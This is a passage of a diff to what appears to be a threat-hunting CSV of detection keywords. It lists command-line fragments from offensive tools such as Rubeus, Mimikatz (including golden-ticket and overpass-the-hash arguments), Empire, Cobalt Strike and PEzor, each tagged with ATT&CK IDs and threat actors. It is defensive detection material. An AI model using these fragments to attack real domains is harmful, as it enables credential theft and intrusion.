Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetafter:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /pwdsetbefore:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /rc4opsec *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4uproxytarget*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /s4utransitedservices*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /service:krbtgt *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /simple * /spn*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:* /autoenterprise *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* /ticket:*.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* /user:* /domain:* /aes256:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /ntlm:* /run:powershell.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /sid:S-1-5-21-* 
/krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* /usetgtdeleg *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* \Temp\blah.exe*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* | Find-AmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* | Test-ContainsAmsiSignatures*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI 
signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* > \\127.0.0.1\ADMIN$\__* 2>&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"* > Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* 0.0.0.0:8080 --threads*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"* 1.2.3.4:8080*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","0","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "* 4444 meter","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* 4444 shell","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" -"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"* '46993522-7D77-4B59-9B77-F82082DE9D81' *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "* -64 -format=bof *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -64 -format=dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -64 -format=service-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"* -a 1 -f *.dll -p http*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
